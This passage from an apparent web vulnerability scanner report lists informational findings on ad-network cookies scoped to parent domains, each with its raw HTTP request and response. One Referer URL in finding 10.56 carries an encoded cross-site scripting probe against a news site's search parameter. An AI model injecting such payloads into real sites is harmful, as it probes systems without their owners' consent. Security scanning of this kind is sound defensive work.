pjqRBGq6xSQJm3Iw%3d%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:10 GMT; path=/
Set-Cookie: dis=*1AIhVRSZrQgYu9x47ppfIGqqnT57MQO9KKEitnRSffraIMr16RaqB2jBwUTPWIs60iAfgOM%2bJyadJJMNrThoicjk6JBenkl27rLp7xnDfdVxENXrZoJIZ%2brOdTm%2bhZcp9HEu0Wsa6G79lcjBzWSIh4SpHnpBSph43jRgJXOPpaLg%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:10 GMT; path=/
Set-Cookie: udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:10 GMT; path=/
Content-Length: 4470

<html>
<head>
<title>Dising</title>
<script type="text/javascript">
function edcTimeout(){}
function write_edc(){}
function initEdc(){}
function cto_AI(u,n,r){if(document.createElement){if(r){v
...[SNIP]...

10.54. http://ebay.adnxs.com/ttj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ebay.adnxs.com
Path:	/ttj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly
icu=ChIIv48BEAoYASABKAEwnZHp7wQQnZHp7wQYAA..; path=/; expires=Wed, 14-Sep-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw))ByG5K)WgR>XlY*EC'kUpXhj*P*+]Gul+osXm]lt]?P/SoZL]sB9B]8%@vLP4*=XWc9.bXJOutGe)tE+h#TvUwTYZnD8y+vgK52P(VTU[Sh`!nac9x5oe-2vrT91H.Apjj8`[[d+ndbpBK79hO/ryJOE'nase*e`GYL7d8#9H.<cIKUj66[pje<@P>jCVU=Bs1%awLx(B[>e=k6]mmU17XdGDpX*FFDaoNb8qbdr13!bpB[pD4u9LI:=w(2uqxb6d%Vut#GHt!2a#ACJmvWRBZ@Zn4ke6#cNEU1qEgk`4ZmgEQKk3klbgJ?a.wR!NVV0Y+Pd9/3U6R7jX:GjkGNpTuZ0Z788Da#gF%u0P_%@Lci$M(.#-y?qLRCSD)77Sljc_r3APj#)p-qeIw0hq`xlhk]L#'K(8+fa7cLiJE-]JGR`r1QYv+wG9GW`hw?jy0ru[hggFvB$b8c'vwL>=LgLY+`*hi(wescP)#G]'VpN88-2qu]tRip!o%.MIt`ldUW=Ye6_c`q^`m#rWhRJj!8R.i.Wb+!=<loD`lq=zg]o%/`SWA0^bF<6l$plXJu)rwQog9z4N8#/UBj/U[0x/Xx@ixurDOIuos]rs[qw2uk>nY/.-mHStb.#i/-wjN:*bp!:qt9[Fp>A(N!?DlT?c2S41ww[1dtNU`P; path=/; expires=Wed, 14-Sep-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ttj?id=472679&cb=2003200856&pt1=0000768033&pt2=0001004438&pt3=1183&imp_id=v2:I:1308248221:2003200856:0000768033:0001004438:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004438/cstr=43472790=_4dfa489d,2003200856,768033^1004438^1183^0,1_/xsxdata=$XSXDATA/bnum=43472790/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIx6EDEAoYAiACKAIw8Nvo7wQQ8Nvo7wQYAQ..; anj=Kfw))ByG5K)WgR>XlY*EC'kUpXhj*P*+]Gul+osXm]lt]?P/SoZL]sB9B]8%@vLP4*=XWc9.bXJOutGe)tE+h#TvUwTYZnD8y+vgK52P(VTU[Sh`!nac9x5oe-2vrT91H.Apjj8`[[d+ndbpBK79hO/ryJOE'nase*e`GYL7d8#9H.<cIKUj66[pje<@P>jCVU=Bs1%awLx(B[>e=k6]mmU17XdGDpX*FFDaoNb8qbdr13!bpB[pD4u9LI:=w(2uqxb6d%Vut#GHt!2a#ACJmvWRBZ@Zn4ke6#cNEU1qEgk`4ZmgEQKk3klbgJ?a.wR!NVV0Y+Pd9/3U6R7jX:GjkGNpTuZ0Z788Da#gF%u0P_%@Lci$M(.#-y?qLRCSD)77Sljc_r3APj#)p-qeIw0hq`xlhk]L#'K(8+fa7cLiJE-]JGR`r1QYv+wG9GW`hw?jy0ru[hggFvB$b8c'vwL>=LgLY+`*hi(wescP)#G]'VpN88-2qu]tRip!o%.MIt`ldUW=Ye6_c`q^`m#rWhRJj!8R.i.Wb+!=<loD`lq=zg]o%/`SWA0^bF<6l$plXJu)rwQog9z4N8#/UBj/U[0x/Xx@ixurDOIuos]rs[qw2uk>nY/.-mHStb.#i/-wjN:*bp!:qt9[Fp>A(N!?DlT?c2S41ww[1dtNU`P; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwnZHp7wQQnZHp7wQYAA..; path=/; expires=Wed, 14-Sep-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfw))ByG5K)WgR>XlY*EC'kUpXhj*P*+]Gul+osXm]lt]?P/SoZL]sB9B]8%@vLP4*=XWc9.bXJOutGe)tE+h#TvUwTYZnD8y+vgK52P(VTU[Sh`!nac9x5oe-2vrT91H.Apjj8`[[d+ndbpBK79hO/ryJOE'nase*e`GYL7d8#9H.<cIKUj66[pje<@P>jCVU=Bs1%awLx(B[>e=k6]mmU17XdGDpX*FFDaoNb8qbdr13!bpB[pD4u9LI:=w(2uqxb6d%Vut#GHt!2a#ACJmvWRBZ@Zn4ke6#cNEU1qEgk`4ZmgEQKk3klbgJ?a.wR!NVV0Y+Pd9/3U6R7jX:GjkGNpTuZ0Z788Da#gF%u0P_%@Lci$M(.#-y?qLRCSD)77Sljc_r3APj#)p-qeIw0hq`xlhk]L#'K(8+fa7cLiJE-]JGR`r1QYv+wG9GW`hw?jy0ru[hggFvB$b8c'vwL>=LgLY+`*hi(wescP)#G]'VpN88-2qu]tRip!o%.MIt`ldUW=Ye6_c`q^`m#rWhRJj!8R.i.Wb+!=<loD`lq=zg]o%/`SWA0^bF<6l$plXJu)rwQog9z4N8#/UBj/U[0x/Xx@ixurDOIuos]rs[qw2uk>nY/.-mHStb.#i/-wjN:*bp!:qt9[Fp>A(N!?DlT?c2S41ww[1dtNU`P; path=/; expires=Wed, 14-Sep-2011 18:17:01 GMT; domain=.adnxs.com; HttpOnly
Location: http://rover.ebay.com/ar/1/76418/4?mpt=1308248221&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&imp_id=2884646768651692769&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=328072&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA./cnd=!6gSCKQj4uwIQrp0UGIf5AiAD/referrer=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860/clickenc=http%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D
Date: Thu, 16 Jun 2011 18:17:01 GMT
Content-Length: 0

10.55. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:07:56 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://matcher-apx.bidder7.mookie1.com/appnexus?adnxs_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1; sess=1; uuid2=3420415245200633085; anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 16:07:56 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:07:56 GMT; domain=.adnxs.com; HttpOnly
Location: http://matcher-apx.bidder7.mookie1.com/appnexus?adnxs_uid=3420415245200633085
Date: Thu, 16 Jun 2011 16:07:56 GMT
Content-Length: 0

10.56. http://ib.adnxs.com/getuidu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=7226644042610287825; path=/; expires=Thu, 15-Sep-2011 10:11:59 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward= HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: icu=ChII3oQBEAoYAiACKAIwvvOg7wQQvvOg7wQYAQ..; uuid2=7226644042610287825; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'-LIFbA<^r!$t'-BASc50#=dn`sCe^PfJ^fFmI/H2Bf9R1]`HmL!6C/oyX#+0S%K+8zY.N3s<P`gQ6XA)oueSz)AR!x2av1nm(v[IjK>GHVk?a+:o!*S.>gU'ZG; sess=1

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 18-Jun-2011 10:11:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7226644042610287825; path=/; expires=Thu, 15-Sep-2011 10:11:59 GMT; domain=.adnxs.com; HttpOnly
Location: http://a.rfihub.com/cm?apxuid=7226644042610287825&forward=
Date: Fri, 17 Jun 2011 10:11:59 GMT
Content-Length: 0

10.57. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly
uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ; path=/; expires=Wed, 14-Sep-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=364&user=2814750682866683,rcHW803OVbgACmEf HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1; sess=1; uuid2=3420415245200633085; anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ; path=/; expires=Wed, 14-Sep-2011 16:07:50 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 16 Jun 2011 16:07:50 GMT

GIF89a.............!.......,........@..L..;

10.58. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
icu=ChIIx6EDEAoYAiACKAIwvNno7wQQvNno7wQYAQ..; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)lByDua)J710aPA0[:Pu_J9:BG^`l@=.O6Gp#_sLmr]hz%=_O[/t[y>fUSxS0CGsaUK#rr8E)Th5x@$E8w(gtkK?74:u#ZqW#kqC4rj!yxxuRSuPr'.3M+jk`Ehf(+Xu%LH<lL3_P-OT9c_(cUy1yAy%=`3rYunOd?h)8FQbl/2nq2-.O%5f#AL5e9eDuVn3i!!71kCd^Sv2suc5ghUxN^QPXb*W2kM/XS`nF_/v2`h4JKyyC81q5QRSl-_(%H21((wr>r%##Q>*IS>+19R'$K7DKdacc!KwMI4lk%78<(xzs%F^f?%vsX_a4bTwE3_!cKHPcv6^aPk:]+ZRqfWAdnwT(:>X>AFxEO5LU)NF:pKfN4+J-sVzkSftWr+m9LP01itX*3$2OYo4IRnj!)/HyN3C0FBv)d%TYL_[Wq[xFkr0u'C-b:Uufq7gT[7zyceD#`y!9^/@:Kf/@%JzVPS93$%TAfA'@r1nPs99WWB^ydwW]kV?_w#fWgKTQ.*-s1Rs#Gc(:vxV87q_bXUQaUy%G>G$-waWzeLjDEb*SEaWwv*jbDIMX(WG'7RS..jinLwKH^9`DN)tn*KtHiHDx0]'wh@u5tnA^9`rL/P$Mv83obr!B[KNoG=X@-'av%5I8Mk@PzWgM1nJl*VfNVhGccatm]20$^Q; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=514&size=300x250&referrer=http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf%3Ft=1308241078986%26tz=300%26m=0%26hu=%26ht=js%26hp=0%26fo=%26url=UniversalAudiencePlatform23.com%26refer=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&inv_code=1457934&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1457934%26r%3D0%26_salt%3D1248176818%26u%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308241078986%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%26u%3Dhttp%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1; anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIx6EDEAoYAiACKAIwvNno7wQQvNno7wQYAQ..; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
